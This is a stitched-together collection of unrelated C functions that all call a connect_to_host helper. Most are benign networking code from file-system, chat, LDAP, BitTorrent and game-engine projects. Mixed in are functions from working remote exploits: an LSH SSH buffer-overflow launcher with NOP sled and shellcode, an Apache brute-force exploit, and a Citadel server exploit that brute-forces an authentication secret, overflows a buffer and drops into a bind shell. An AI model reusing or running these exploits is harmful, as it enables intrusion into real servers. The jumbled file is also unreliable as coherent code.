int irods_reli_md5( const char *host, const char *path, char *digest ) { dataObjInp_t request; int result; char *str = 0; struct irods_server *server = connect_to_host(host); if(!server) return -1; memset(&request,0,sizeof(request)); strcpy(request.objPath,path); debug(D_IRODS,"rcDataObjChksum %s %s",host,path); result = rcDataObjChksum(server->conn,&request,&str); debug(D_IRODS,"= %d",result); if(result<0) { errno = irods_reli_errno(result); return -1; } else { /* rcDataObjChecksum returns the checksum as ASCII */ /* but Parrot is expecting 16 bytes of binary data */ int i; for(i=0;i<16;i++) { digest[i] = hex_to_byte(&str[2*i]); } debug(D_IRODS,"%s",str); free(str); return 0; } }
int irods_reli_putfile ( const char *host, const char *path, const char *local_path ) { dataObjInp_t request; int result; struct irods_server *server = connect_to_host(host); if(!server) return -1; memset(&request,0,sizeof(request)); strcpy(request.objPath,path); request.numThreads = 0; // server chooses threads request.openFlags = O_CREAT|O_WRONLY; addKeyVal (&request.condInput, FORCE_FLAG_KW, ""); addKeyVal (&request.condInput, ALL_KW, ""); debug(D_IRODS,"rcDataObjPut %s %s %s",host,path,local_path); result = rcDataObjPut(server->conn,&request,(char*)local_path); debug(D_IRODS,"= %d",result); clearKeyVal (&request.condInput); if(result<0) { errno = irods_reli_errno(result); return -1; } return 0; }
static int irods_reli_lseek_if_needed( struct irods_file *file, INT64_T offset ) { openedDataObjInp_t request; fileLseekOut_t *response=0; int result; struct irods_server *server = connect_to_host(file->host); if(!server) return -1; if(!connect_to_file(server,file)) return -1; if(file->offset==offset) return 0; memset(&request,0,sizeof(request)); request.l1descInx = file->fd; request.offset = offset; request.whence = SEEK_SET; debug(D_IRODS,"rcDataObjLseek %s %d %lld",file->host,file->fd,(long long)offset); result = rcDataObjLseek(server->conn,&request,&response); debug(D_IRODS,"= %d",result); if(result<0) { errno = irods_reli_errno(result); return -1; } free(response); file->offset = offset; return 0; }
int irods_reli_pwrite ( struct irods_file *file, const char *data, int length, INT64_T offset ) { int result; openedDataObjInp_t request; bytesBuf_t response; struct irods_server *server = connect_to_host(file->host); if(!server) return -1; if(!connect_to_file(server,file)) return -1; if(irods_reli_lseek_if_needed(file,offset)<0) return -1; memset(&request,0,sizeof(request)); request.l1descInx = file->fd; request.len = length; response.buf = (char*)data; response.len = length; debug(D_IRODS,"rcDataObjWrite %s %d %d",file->host,file->fd,length); result = rcDataObjWrite(server->conn,&request,&response); debug(D_IRODS,"= %d",result); if(result<0) { errno = irods_reli_errno(result); return -1; } file->offset += result; return result; }
int do_bind_shell() { fd_set rfds; int sock,retVal,r; if((sock=connect_to_host(BINDSHELL_PORT))==-1) return -1; printf("[-] Success!!! You should now be r00t on %s\n", host); do { FD_ZERO(&rfds); FD_SET(0, &rfds); FD_SET(sock, &rfds); retVal=select(sock+1, &rfds, NULL, NULL, NULL); if(retVal) { if(FD_ISSET(sock, &rfds)) { buf[(r=recv(sock, buf, SIZ-1,0))]='\0'; // bad! printf("%s", buf); } if(FD_ISSET(0, &rfds)) { buf[(r=read(0, buf, SIZ-1))]='\0'; // bad! send(sock, buf, strlen(buf), 0); } } } while(retVal && r); // loop until connection terminates close(sock); return 1; }
static void CheckMissing(struct servercstruct *server) { int delay; if(!IsConnecting(server->sinfo)&&(server->nexttry<=currtime) ) { if(server->server!=NULL) { DelServer(server->server); server->server=NULL; } if(botinfo->maxtries != 0 && server->conatt >= botinfo->maxtries) { NotConnectable(server->sinfo); return; } server->conatt++; delay=CalcConDelay(server->conatt); server->nexttry=currtime+delay; info_log("Connecting to %s attempt %i next attempt in %i seconds\n",server->address, server->conatt, delay); AddServer(server->sinfo, server->address, botinfo->nick); /* convert botinfo->timout (minutes) to sinfo->timeout (seconds) */ server->sinfo->timeout=botinfo->timeout * 60; //disconnectonidle(server->sinfo); connect_to_host(server->sinfo,server->address,server->port); } }
int irods_reli_rename ( const char *host, const char *path, const char *newpath ) { dataObjCopyInp_t request; int result; /* rcDataObjRename does not have the Unix semantics of atomically destroying the target file. So, we must do it ourselves. */ irods_reli_unlink(host,newpath); struct irods_server *server = connect_to_host(host); if(!server) return -1; memset(&request,0,sizeof(request)); strcpy(request.srcDataObjInp.objPath,path); strcpy(request.destDataObjInp.objPath,newpath); request.srcDataObjInp.oprType = RENAME_DATA_OBJ; request.destDataObjInp.oprType = RENAME_DATA_OBJ; debug(D_IRODS,"rcDataObjRename %s %s %s",host,path,newpath); result = rcDataObjRename(server->conn,&request); debug(D_IRODS,"= %d",result); if(result<0) { errno = irods_reli_errno(result); return -1; } return result; }
/* * Get version number */ static gint get_version(QQInfo *info) { int ret = NO_ERR; Request *req = request_new(); Response *rps = NULL; gint res = 0; request_set_method(req, "GET"); request_set_version(req, "HTTP/1.1"); request_set_uri(req, VERPATH); request_set_default_headers(req); request_add_header(req, "Host", LOGINPAGEHOST); Connection *con = connect_to_host(LOGINPAGEHOST, 80); if(con == NULL){ g_warning("Can NOT connect to server!(%s, %d)" , __FILE__, __LINE__); request_del(req); return NETWORK_ERR; } send_request(con, req); res = rcv_response(con, &rps); close_con(con); connection_free(con); const gchar *retstatus = rps -> status -> str; if (-1 == res || !rps) { g_warning("Null point access (%s, %d)\n", __FILE__, __LINE__); ret = -1; goto error; } if(g_strstr_len(retstatus, -1, "200") == NULL){ g_warning("Server status %s (%s, %d)", retstatus , __FILE__, __LINE__); ret = NETWORK_ERR; goto error; } gchar *lb, *rb; gchar *ms = rps -> msg -> str; lb = g_strstr_len(ms, -1, "("); if(lb == NULL){ g_warning("Get version error!! %s (%s, %d)",rps -> msg -> str , __FILE__, __LINE__); ret = NETWORK_ERR; goto error; } ++lb; rb = g_strstr_len(ms, -1, ")"); *rb = '\0'; info -> version = g_string_new(lb); g_debug("Version: %s(%s, %d)", lb, __FILE__, __LINE__); error: request_del(req); response_del(rps); return ret; }
struct chirp_file * chirp_reli_open( const char *host, const char *path, INT64_T flags, INT64_T mode, time_t stoptime ) { struct chirp_file *file; int delay=0; time_t nexttry; INT64_T result; struct chirp_stat buf; time_t current; while(1) { struct chirp_client *client = connect_to_host(host,stoptime); if(client) { result = chirp_client_open(client,path,flags,mode,&buf,stoptime); if(result>=0) { file = xxmalloc(sizeof(*file)); strcpy(file->host,host); strcpy(file->path,path); memcpy(&file->info,&buf,sizeof(buf)); file->fd = result; file->flags = flags & ~(O_CREAT|O_TRUNC); file->mode = mode; file->serial = chirp_client_serial(client); file->stale = 0; file->buffer = malloc(chirp_reli_blocksize); file->buffer_offset = 0; file->buffer_valid = 0; file->buffer_dirty = 0; return file; } else { if(errno!=ECONNRESET) return 0; } invalidate_host(host); } else { if(errno==ENOENT) return 0; } if(time(0)>=stoptime) { errno = ECONNRESET; return 0; } if(delay>=2) debug(D_NOTICE,"couldn't connect to %s: still trying...\n",host); debug(D_CHIRP,"couldn't talk to %s: %s\n",host,strerror(errno)); current = time(0); nexttry = MIN(stoptime,current+delay); debug(D_CHIRP,"try again in %d seconds\n",(int)(nexttry-current)); sleep_until(nexttry); if(delay==0) { delay = 1; } else { delay = MIN(delay*2,MAX_DELAY); } } }
Error StreamPeerTCP::_connect(const String &p_address, int p_port) { IP_Address ip; if (p_address.is_valid_ip_address()) { ip = p_address; } else { ip = IP::get_singleton()->resolve_hostname(p_address); if (!ip.is_valid()) return ERR_CANT_RESOLVE; } connect_to_host(ip, p_port); return OK; }
INT64_T chirp_reli_close( struct chirp_file *file, time_t stoptime ) { struct chirp_client *client; if(chirp_reli_flush(file,stoptime) < 0) return -1; client = connect_to_host(file->host,stoptime); if(client) { if(chirp_client_serial(client)==file->serial) { chirp_client_close(client,file->fd,stoptime); } } free(file->buffer); free(file); return 0; }
int irods_reli_rmdir ( const char *host, const char *path ) { collInp_t request; int result; /* Note that an irods rmdir will fail silently if you attempt to remove a non-directory. So, first we must examine the type and fail explicitly if it is not a dir. */ struct pfs_stat info; result = irods_reli_stat(host,path,&info); if(result<0) return result; if(!S_ISDIR(info.st_mode)) { errno = EISDIR; return -1; } struct irods_server *server = connect_to_host(host); if(!server) return -1; memset(&request,0,sizeof(request)); strcpy(request.collName,path); addKeyVal (&request.condInput, FORCE_FLAG_KW, ""); debug(D_IRODS,"rcRmColl %s %s",host,path); result = rcRmColl(server->conn,&request,0); debug(D_IRODS,"= %d",result); clearKeyVal (&request.condInput); if(result<0) { errno = irods_reli_errno(result); return -1; } return result; }
int irods_reli_mkdir ( const char *host, const char *path ) { collInp_t request; int result; struct irods_server *server = connect_to_host(host); if(!server) return -1; memset(&request,0,sizeof(request)); strcpy(request.collName,path); debug(D_IRODS,"rcCollCreate %s %s",host,path); result = rcCollCreate(server->conn,&request); debug(D_IRODS,"= %d",result); if(result<0) { errno = irods_reli_errno(result); return -1; } return result; }
// 正确的关闭客户端 void client_shutdown(int sig) { // 设置全局停止变量以停止连接到其他peer, 以及允许其他peer的连接. Set global stop variable so that we stop trying to connect to peers and // 这控制了其他peer连接的套接字和连接到其他peer的线程. exit_window(); g_done=1; int sockfd = connect_to_host(g_tracker_ip, g_tracker_port); int request_len = 0; char *request = make_tracker_request(BT_STOPPED, &request_len); send(sockfd, request, request_len, 0); free(request); close(sockfd); close(g_peerport); close(listenfd); int i; for (i = 0; i <g_torrentmeta->filenum; i++){ if (g_torrentmeta->flist[i].fp!=NULL) fclose(g_torrentmeta->flist[i].fp); } sleep(1); exit(0); }
int irods_reli_close ( struct irods_file *file ) { int result; openedDataObjInp_t request; struct irods_server *server = connect_to_host(file->host); if(!server) return -1; if(!connect_to_file(server,file)) return -1; memset(&request,0,sizeof(request)); request.l1descInx = file->fd; debug(D_IRODS,"rcDataObjClose %s %d",file->host,file->fd); result = rcDataObjClose(server->conn,&request); debug(D_IRODS,"= %d",result); free(file->host); free(file->path); free(file); return 0; }
int irods_reli_truncate ( const char *host, const char *path, INT64_T length ) { dataObjInp_t request; int result; struct irods_server *server = connect_to_host(host); if(!server) return -1; memset(&request,0,sizeof(request)); strcpy(request.objPath,path); request.dataSize = length; debug(D_IRODS,"rcDataObjTruncate %s %s",host,path); result = rcDataObjTruncate(server->conn,&request); debug(D_IRODS,"= %d",result); if(result<0) { errno = irods_reli_errno(result); return -1; } return 0; }
int shell( u_long ip ) { int fd; int rd ; fd_set rfds; static char buff[ 1024 ]; fprintf(stdout,"[+] Checking if exploit worked\n"); if ( (fd=connect_to_host( ip, 30464 )) == -1 ) { fprintf( stderr, "[-] Did not worked.\n"); return( -1 ); } write(fd, COMMAND, strlen( COMMAND )); while(1) { FD_ZERO( &rfds ); FD_SET(0, &rfds); FD_SET(fd, &rfds); if(select(fd+1, &rfds, NULL, NULL, NULL) < 1) return( 0 ); if(FD_ISSET(0,&rfds)) { if( (rd = read(0,buff,sizeof(buff))) < 1) die("shell(): read from stdin"); if( write(fd,buff,rd) != rd) die("shell(): write to sock"); } if(FD_ISSET(fd,&rfds)) { if( (rd = read(fd,buff,sizeof(buff))) < 1) die("see you next time, bye."); write(1,buff,rd); } } }
/* * Get the psessionid. * * This function is the last step of loginning */ static int get_psessionid(QQInfo *info) { int ret = NO_ERR; gint res = 0; if(info -> ptwebqq == NULL || info -> ptwebqq -> len <= 0){ g_warning("Need ptwebqq!!(%s, %d)", __FILE__, __LINE__); return PARAMETER_ERR; } Request *req = request_new(); Response *rps = NULL; request_set_method(req, "POST"); request_set_version(req, "HTTP/1.1"); request_set_uri(req, PSIDPATH); request_set_default_headers(req); request_add_header(req, "Host", PSIDHOST); request_add_header(req, "Cookie2", "$Version=1"); request_add_header(req, "Referer" , "http://d.web2.qq.com/proxy.html?v=20101025002"); GString *clientid = generate_clientid(); info -> clientid = clientid; g_debug("clientid: %s", clientid -> str); gchar* msg = g_malloc(500); g_snprintf(msg, 500, "{\"status\":\"%s\",\"ptwebqq\":\"%s\"," "\"passwd_sig\":""\"\",\"clientid\":\"%s\"" ", \"psessionid\":null}" , info -> me -> status -> str, info -> ptwebqq -> str , clientid -> str); gchar *escape = g_uri_escape_string(msg, NULL, FALSE); g_snprintf(msg, 500, "r=%s", escape); g_free(escape); request_append_msg(req, msg, strlen(msg)); gchar cl[10]; g_sprintf(cl, "%u", (unsigned int)strlen(msg)); request_add_header(req, "Content-Length", cl); request_add_header(req, "Content-Type" , "application/x-www-form-urlencoded"); g_free(msg); gchar *cookie = g_malloc(2000); gint idx = 0; if(info -> ptvfsession != NULL){ idx += g_snprintf(cookie + idx, 2000 - idx, "ptvfsession=%s; " , info -> ptvfsession -> str); } idx += g_snprintf(cookie + idx, 2000 - idx, "%s" , info -> cookie -> str); request_add_header(req, "Cookie", cookie); g_free(cookie); Connection *con = connect_to_host(PSIDHOST, 80); if(con == NULL){ g_warning("Can NOT connect to server!(%s, %d)" , __FILE__, __LINE__); request_del(req); return NETWORK_ERR; } send_request(con, req); res = rcv_response(con, &rps); if (-1 == res || !rps) { g_warning("Null point access (%s, %d)\n", __FILE__, __LINE__); ret = -1; goto error; } const gchar *retstatus = rps -> status -> str; if(g_strstr_len(retstatus, -1, "200") == NULL){ g_warning("Server status %s (%s, %d)", retstatus , __FILE__, __LINE__); ret = NETWORK_ERR; goto error; } json_t *json = NULL; switch(json_parse_document(&json, rps -> msg -> str)) { case JSON_OK: break; default: g_warning("json_parser_document: syntax error. (%s, %d)" , __FILE__, __LINE__); ret = NETWORK_ERR; goto error; } json_t *val; val = json_find_first_label_all(json, "retcode"); if(val -> child -> text[0] != '0'){ g_warning("Server return code %s(%s, %d)", val -> child -> text , __FILE__, __LINE__); ret = NETWORK_ERR; goto error; } val = json_find_first_label_all(json, "seskey"); if(val != NULL){ g_debug("seskey: %s (%s, %d)", val -> child -> text , __FILE__, __LINE__); info -> seskey = g_string_new(val -> child -> text); } val = json_find_first_label_all(json, "cip"); if(val != NULL){ info -> cip = g_string_new(val -> child -> text); } val = json_find_first_label_all(json, "index"); if(val != NULL){ info -> index = g_string_new(val -> child -> text); } val = json_find_first_label_all(json, "port"); if(val != NULL){ info -> port = g_string_new(val -> child -> text); } val = json_find_first_label_all(json, "status"); { g_debug("status: %s (%s, %d)", val -> child -> text , __FILE__, __LINE__); } val = json_find_first_label_all(json, "vfwebqq"); if(val != NULL){ g_debug("vfwebqq: %s (%s, %d)", val -> child -> text , __FILE__, __LINE__); info -> vfwebqq = g_string_new(val -> child -> text); } val = json_find_first_label_all(json, "psessionid"); if(val != NULL){ g_debug("psessionid: %s (%s, %d)", val -> child -> text , __FILE__, __LINE__); info -> psessionid = g_string_new(val -> child -> text); }else{ g_debug("Can not find pesssionid!(%s, %d): %s" , __FILE__, __LINE__, rps -> msg -> str); } error: json_free_value(&json); close_con(con); connection_free(con); request_del(req); response_del(rps); return ret; }
int attempt_exploit(void) { fd_set rfds; int sock,retVal,r; if(exactPointerAddy) { printf("[-] Using 0x%08x for pointer addy\n", exactPointerAddy); if((sock=connect_to_host(HTTP_PORT))<=0) return sock; magic_r=exactPointerAddy; make_exploitbuf(buf); my_send(sock, buf); my_recv(sock); close(sock); my_sleep(100000); if((sock=connect_to_host(SHELL_PORT))<=0) { return sock; } } else { // Do crappy bruteforce loop printf("[-] Attempting attack [ %s ] ...\n", targets[useTarget].platform); MAGIC_R_START=targets[useTarget].bruteStart; MAGIC_R_END=targets[useTarget].bruteEnd; retAddr=targets[useTarget].retAddr; for(magic_r=MAGIC_R_START; magic_r<=MAGIC_R_END; magic_r++) { printf("[-] Trying 0x%08x ... \r", magic_r);fflush(stdout); if((sock=connect_to_host(HTTP_PORT))<=0) return sock; make_exploitbuf(buf); my_send(sock, buf); my_recv(sock); close(sock); my_sleep(50000); if((sock=connect_to_host(SHELL_PORT))>=SUCCESS) { printf("\n[-] Found request_rec address @ 0x%08x\n", magic_r); break; } } if(magic_r>MAGIC_R_END) return BRUTE_FORCE_EXHAUSTED; } printf("[-] Connected to %s! You can type commands now:\n", host); // Now let the attacker issue commands to the remote // shell, just as if (s)he had launched 'nc host 45295'. do { FD_ZERO(&rfds); FD_SET(0, &rfds); FD_SET(sock, &rfds); retVal=select(sock+1, &rfds, NULL, NULL, NULL); if(retVal) { if(FD_ISSET(sock, &rfds)) { buf[(r=recv(sock, buf, SIZ-1,0))]='\0'; // bad! printf("%s", buf); } if(FD_ISSET(0, &rfds)) { buf[(r=read(0, buf, SIZ-1))]='\0'; // bad! send(sock, buf, strlen(buf), 0); } } } while(retVal && r); // loop until connection terminates close(sock); return SUCCESS; }
/* ARGSUSED */ int open_ldap_connection(LDAP *ld, Sockbuf *sb, char *host, int defport, char **krbinstancep, int async) { int rc, port; char *p, *q, *r; char *curhost, hostname[ 2*MAXHOSTNAMELEN ]; int bindTimeout; Debug(LDAP_DEBUG_TRACE, catgets(slapdcat, 1, 196, "open_ldap_connection\n"), 0, 0, 0); defport = htons(defport); bindTimeout = ld->ld_connect_timeout; if (host != NULL) { for (p = host; p != NULL && *p != '\0'; p = q) { if ((q = strchr(p, ' ')) != NULL) { (void) strncpy(hostname, p, q - p); hostname[ q - p ] = '\0'; curhost = hostname; while (*q == ' ') { ++q; } } else { /* avoid copy if possible */ curhost = p; q = NULL; } if ((r = strchr(curhost, ':')) != NULL) { if (curhost != hostname) { /* now copy */ (void) strcpy(hostname, curhost); r = hostname + (r - curhost); curhost = hostname; } *r++ = '\0'; port = htons((short)atoi(r)); } else { port = defport; } if ((rc = connect_to_host(sb, curhost, 0, port, async, bindTimeout)) != -1) { break; } } } else { rc = connect_to_host(sb, NULL, htonl(INADDR_LOOPBACK), defport, async, bindTimeout); } if (rc == -1) { return (rc); } if (krbinstancep != NULL) { #ifdef KERBEROS if ((*krbinstancep = host_connected_to(sb)) != NULL && (p = strchr(*krbinstancep, '.')) != NULL) { *p = '\0'; } #else /* KERBEROS */ krbinstancep = NULL; #endif /* KERBEROS */ } return (0); }
main(int argc, char **argv) { int ch, i, targetSock; unsigned long *retPtr; char *charRetPtr; printf("LSH 1.4.x (others?) exploit by Haggis ([email protected])\n\n"); while((ch=getopt(argc, argv, "t:T:h"))!=-1) { switch(ch) { case 't': strncpy(host, optarg, SIZ-1); break; case 'T': useTarget=atoi(optarg); break; case 'h': default: printf("%s\n",usage); printf("Available platforms:\n"); for(i=0;targets[i].platform;i++) printf(" %2d. %s\n", i, targets[i].platform); printf("\n"); exit(0); break; } } if(host[0]=='\0') { printf("[*] You must specify a host! Use -h for help\n"); exit(1); } if((hostStruct=gethostbyname(host))==NULL) { printf("[*] Couldn't resolve host %s\nUse '%s -h' for help\n", host,argv[0]); exit(1); } if((targetSock=connect_to_host(SSH_PORT))==-1) { printf("[*] Coulnd't connect to host %s\n", host); exit(1); } my_recv(targetSock); printf("[-] Building exploit buffer...\n"); retPtr=(unsigned long *)buf; for(i=0;i<EXPLOIT_BUF_SIZE/4;i++) *(retPtr++)=targets[useTarget].retAddr; charRetPtr=(unsigned char *)retPtr; for(i=0;i<NOPS_LEN-strlen(shellcode);i++) *(charRetPtr++)=(unsigned long)0x90; memcpy(charRetPtr, shellcode, strlen(shellcode)); *(charRetPtr+strlen(shellcode))='\n'; *(charRetPtr+strlen(shellcode)+1)='\0'; printf("[-] Sending exploit string...\n"); my_send(targetSock, buf); close(targetSock); printf("[-] Sleeping...\n"); my_sleep(100000); printf("[-] Connecting to bindshell...\n"); if(do_bind_shell()==-1) printf("[*] Could not connect to %s - the exploit failed\n", host); exit(0); }
int attempt_exploit(void) { int magic; // Connect to the host and grab the banner printf("[-] Connecting to Citadel server (%s) on port %d\n", host, CITADEL_PORT); if((sock=connect_to_host(host,CITADEL_PORT)) < 1) return sock; my_recv(sock); // Attempt to brute-force the secret IPGM authentication number. // Only do this if magic number is not given on command-line (-i flag). magic=magicNumber; if(!magic) { printf("[-] Starting bruteforce operation ...\n");fflush(stdout); if((magic=brute_force(sock))==-1) { return BRUTE_FORCE_EXHAUSTED; } printf("[-] Success! IPGM=%d (seed: %d)\n", magic, seed); magicNumber=magic; // set magicNumber so we don't run bruteforcer again // Tear down the socket, and reconnect again (to reauthenticate), printf("[-] Re-establishing connection to %s ...\n",host); my_send(sock, "QUIT\n"); my_recv(sock); close(sock); if(!(sock=connect_to_host(host,CITADEL_PORT))) return sock; } // Authenticate as internal program, but unlike the brute-force attempts, // tag 4K of shellcode on the end of the request printf("[-] Authenticating as internal progam ...\n"); make_shellcode(buf); my_send(sock, "IPGM %d %s\n", magic, buf); LOCAL_NET(); buf[recv(sock,buf,SIZ-1,0)]=0; // don't do this at home, kids! if(strncmp(buf, "200",3)) { return INCORRECT_IPGM_SECRET; } // Increase the chance of the shellcode being in the correct place at the // correct time by sending it many times... this lets each worker thread // in Citserver copy the shellcode into a buffer, making it almost // certain that we can jump to it successfully (it hasn't failed once!) // Shellcode is stored in a buffer that is used by Citserver to hold // text that would normally get logged to stderr. As Citserver usually // runs as a daemon, this exploit doesn't show in any logs at all. increase_chances(sock,magic); // Enter configuration import mode, specifically the 'floor' section, // although I think others may be vulnerable too printf("[-] Entering config mode ...\n"); my_send(sock, "ARTV import\n"); my_recv(sock); my_send(sock, "floor\n"); // Start the vulnerable import process which blindly reads in 6 lines of // data. These lines are read into buffers 4K in size, and the data is // also truncated at 4K... Unfortunately, the 3rd line goes into a 256 // byte buffer which, of course, overflows.. printf("[-] Sending exploit strings ...\n"); my_send(sock, "a\n"); my_send(sock, "a\n"); // Overflow occurs when this buffer is read by the server, so make sure // it's padded to the correct size with the evil RET address tagged on // the end. make_exploitbuf(buf); my_send(sock,buf); // Send the final 3 lines of text. It can be anything we like... make_shellcode(buf); for(i=0;i<3;i++) my_send(sock,buf); // The server will now have RETurned to the new, malicious saved EIP and // is executing the shellcode... We close the connection, wait a couple of // seconds and then connect to the shell which is bound to port 45295. close(sock); printf("[-] Waiting before connecting to shell...\n"); sleep(2); printf("[-] Now connecting to shell...\n"); if(!(sock=connect_to_host(host,SHELL_PORT))) { return SHELL_NOT_FOUND; } printf("[-] Connected! You can type commands now:\n"); // Now let the attacker issue commands to the remote // shell, just as if (s)he had launched 'nc host 45295'. do { FD_ZERO(&rfds); FD_SET(0, &rfds); FD_SET(sock, &rfds); retVal=select(sock+1, &rfds, NULL, NULL, NULL); if(retVal) { if(FD_ISSET(sock, &rfds)) { buf[(r=recv(sock, buf, SIZ-1,0))]='\0'; // bad! printf("%s", buf); } if(FD_ISSET(0, &rfds)) { buf[(r=read(0, buf, SIZ-1))]='\0'; // bad! send(sock, buf, strlen(buf), 0); } } } while(retVal && r); // loop until connection terminates // Be an environmentally friendly programmer and free resources before exiting... close(sock); return 1; }
static gint do_logout(QQInfo *info, GError **err) { gint ret_code = 0; gint res = 0; g_debug("Logout... (%s, %d)", __FILE__, __LINE__); if(info -> psessionid == NULL || info -> psessionid -> len <= 0){ g_warning("Need psessionid !!(%s, %d)", __FILE__, __LINE__); return -1; } gchar params[300]; Request *req = request_new(); Response *rps = NULL; request_set_method(req, "GET"); request_set_version(req, "HTTP/1.1"); g_sprintf(params, LOGOUTPATH"?clientid=%s&psessionid=%s&t=%ld" , info -> clientid -> str , info -> psessionid -> str, get_now_millisecond()); request_set_uri(req, params); request_set_default_headers(req); request_add_header(req, "Host", LOGOUTHOST); request_add_header(req, "Cookie", info -> cookie -> str); request_add_header(req, "Referer", REFERER); Connection *con = connect_to_host(LOGOUTHOST, 80); if(con == NULL){ g_warning("Can NOT connect to server!(%s, %d)" , __FILE__, __LINE__); request_del(req); return -1; } send_request(con, req); res = rcv_response(con, &rps); close_con(con); connection_free(con); if (-1 == res || !rps) { g_warning("Null point access (%s, %d)\n", __FILE__, __LINE__); ret_code = -1; goto error; } const gchar *retstatus = rps -> status -> str; if(g_strstr_len(retstatus, -1, "200") == NULL){ /* * Maybe some error occured. */ g_warning("Resoponse status is NOT 200, but %s (%s, %d)" , retstatus, __FILE__, __LINE__); ret_code = -1; goto error; } json_t *json = NULL; switch(json_parse_document(&json, rps -> msg -> str)) { case JSON_OK: break; default: g_warning("json_parser_document: syntax error. (%s, %d)" , __FILE__, __LINE__); ret_code = -1; goto error; } json_t *retcode, *result; retcode = json_find_first_label_all(json, "retcode"); result = json_find_first_label_all(json, "result"); if(retcode != NULL && result != NULL){ if(g_strstr_len(result -> child -> text, -1, "ok") != NULL){ g_debug("Logout ok!(%s, %d)", __FILE__, __LINE__); ret_code = 0; } }else{ g_debug("(%s, %d)%s", __FILE__, __LINE__, rps -> msg -> str); } json_free_value(&json); error: request_del(req); response_del(rps); return ret_code; }
int main(int argc, char **argv) { program_name = basename(argv[0]); snprintf(doc,DOC_BUFFER_LEN,"%s -- a simple client for COMP-535",program_name); struct arguments arguments; /* Default values. */ arguments.port = -1; arguments.host = NULL; arguments.adaptive = 0; arguments.verbose = 0; arguments.silent = 0; arguments.batch = 0; arguments.devnull = 0; arguments.infile = NULL; argp_parse (&argp, argc, argv, 0, 0, &arguments); verbose_f = 0; if (arguments.verbose) verbose_f = 1; if (arguments.silent) { freopen("/dev/null", "w", stderr); freopen("/dev/null", "w", stdout); } batch_f = arguments.batch; adaptive_f = arguments.adaptive; if (arguments.infile) { if(freopen(arguments.infile, "r", stdin) == NULL){ exit(1); } } sockfd = -1; if (adaptive_f) adaptivefd = -1; signal(SIGINT, interrupt); char foldertmp[] = "clientimgXXXXXX"; char s[INET6_ADDRSTRLEN], *t, *line, linebuf[LINE_SIZE]; char *filename, *filebuf; int cid, l; /* Return values, temp values */ FILE *file; size_t filesize, read, remain, total, chunk; sockfd = connect_to_host(arguments.host, arguments.port, s, sizeof s); if (sockfd == -1) { fprintf(stderr, "failed to connect to server.\n"); global_exit(1); } fprintf(stdout, "Connected to %s\n", s); buffer = ALLOC(readbuffer); buffer->used = 0; // HELLO YES THIS IS SERVER line = recvline(); t = strtok(line,DELIM); if (strcmp(t, "HELLO") != 0){ fprintf(stderr,"Unexpected message from server: %s\nExiting.\n", line); global_exit(0); } t = strtok(NULL,DELIM); cid = (int)strtol(t,NULL,0); if (errno == ERANGE) { /* Not a number? or number too big? */ fprintf(stderr, "Invalid client ID from server. Exiting"); global_exit(1); } fprintf(stdout, "Got client ID: %d\n", cid); if (adaptive_f) { if ((t = strtok(NULL,DELIM)) == NULL){ fprintf(stderr, "Server is not in adaptive mode. Exiting\n"); global_exit(1); } errno = 0; l = (int)strtol(t,NULL,0); if (errno == ERANGE) { /* Not a number? or number too big? */ fprintf(stderr, "Invalid port number from server. Exiting"); global_exit(1); } adaptivefd = connect_to_host(arguments.host, l, NULL, 0); if (adaptivefd == -1) { fprintf(stderr, "failed to connect to adaptive server.\n"); global_exit(2); } snprintf(linebuf, LINE_SIZE, "%d\n", cid); if (send(adaptivefd, linebuf, strlen(linebuf), 0) == -1){ perror("send"); global_exit(1); } } efree(line); if (!arguments.devnull){ mkdtemp(foldertmp); fprintf(stdout, "Storing downloaded images in directory %s.\n", foldertmp); } for (;;) { #ifdef HAS_GNUREADLINE if(snreadline(linebuf, LINE_SIZE, "GET> ") == NULL){ #else if (!batch_f) fprintf(stderr, "GET> "); if(fgets(linebuf, LINE_SIZE, stdin) == NULL){ #endif printf("exit\n"); global_exit(0); } #ifndef HAS_GNUREADLINE trim_in_place(linebuf); #endif if (strlen(linebuf) == 0) continue; /* Hacky hack to transmit panning speed, any 2 or less digit number is considered a pan speed */ if (adaptive_f && strlen(linebuf) < 3 && is_number(linebuf)) { add_newline(linebuf, LINE_SIZE); if (send(adaptivefd, linebuf, strlen(linebuf), 0) == -1){ perror("send"); global_exit(1); } continue; } if (add_newline(linebuf, LINE_SIZE)) { fprintf(stderr, "Command too long.\n"); continue; } if (send(sockfd, linebuf, strlen(linebuf), 0) == -1){ perror("send"); global_exit(1); } remove_newline(linebuf); line = recvline(); t = strtok(line,DELIM); if (strcmp(t, "ERROR") == 0){ t = strtok(NULL,DELIM); fprintf(stderr, "Server> Error: %s\n", t); } else if (strcmp(t, "FILE") == 0) { t = strtok(NULL,DELIM); errno = 0; size_t filesize = (size_t)strtol(t,NULL,0); if (errno == ERANGE) { fprintf(stderr,"Fatal Error: Could not parse file size.\n", t); global_exit(0); } if (!arguments.devnull) { l = snprintf(NULL, 0, "%s/%s", foldertmp, linebuf); filename = (char *)emalloc(l+1); snprintf(filename, l+1, "%s/%s", foldertmp, linebuf); } else { filename = (char *)emalloc(10); snprintf(filename, 10, "/dev/null"); } file = fopen(filename,"wb"); efree(filename); chunk = (filesize > MAX_FILE_BUFFER) ? MAX_FILE_BUFFER : filesize; filebuf = (char *)emalloc(chunk); remain = filesize; total = 0; if (buffer->used > 0){ fwrite(buffer->data, 1, buffer->used, file); total += buffer->used; remain -= buffer->used; buffer->used = 0; } fprintf(stderr,"'%s' [%ld/%ld] (%ld%%)", linebuf, (long)total, (long)filesize, (long)(100*total)/filesize); while (remain > 0) { read = recv(sockfd, filebuf, chunk, 0); if (read == -1) { perror("recv"); global_exit(3); } else if (read == 0) { fprintf(stderr,"Server dropped connection.\n"); global_exit(4); } total += read; remain -= read; fprintf(stderr,"%c[2K\r", 27); fprintf(stderr,"'%s' [%ld/%ld] (%ld%%)", linebuf, (long)total, (long)filesize, (long)(100*total)/filesize); fwrite(filebuf, 1, read, file); } fprintf(stderr,"%c[2K\r", 27); printf("'%s' saved. [%ld/%ld]\n", linebuf, (long)total, (long)filesize); fclose(file); efree(filebuf); } else { verbose("Ignoring unexpected message from server: %s\n", t); } efree(line); } }
